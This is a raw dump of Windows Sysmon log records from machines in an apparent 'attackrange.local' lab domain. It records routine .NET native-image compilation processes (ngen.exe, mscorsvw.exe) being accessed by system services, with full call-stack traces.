14:58:44.997{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC24-607E-B80E-00000000BB01}5652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050580Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:45.235{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C176C17395C2ED8BD7A21312B5C4FF8A,SHA256=F3D6F512812606B9EBB0A9BC8E9C4F3DF1E9D3D8A599BCCE9225B638C60E633E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.997{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC26-607E-CF0E-00000000BB01}5712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.982{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC26-607E-CF0E-00000000BB01}5712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.982{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC26-607E-CF0E-00000000BB01}5712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.935{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC26-607E-CE0E-00000000BB01}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.919{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC26-607E-CE0E-00000000BB01}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.919{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC26-607E-CE0E-00000000BB01}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.872{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC26-607E-CD0E-00000000BB01}6692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.872{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC26-607E-CD0E-00000000BB01}6692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.872{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC26-607E-CD0E-00000000BB01}6692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.841{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC26-607E-CC0E-00000000BB01}6428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.825{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC26-607E-CC0E-00000000BB01}6428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.825{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC26-607E-CC0E-00000000BB01}6428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.778{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC26-607E-CB0E-00000000BB01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.778{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC26-607E-CB0E-00000000BB01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.778{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC26-607E-CB0E-00000000BB01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.700{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC26-607E-CA0E-00000000BB01}6392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.700{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC26-607E-CA0E-00000000BB01}6392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.700{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC26-607E-CA0E-00000000BB01}6392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.653{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC26-607E-C90E-00000000BB01}4588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.638{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC26-607E-C90E-00000000BB01}4588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.638{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC26-607E-C90E-00000000BB01}4588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 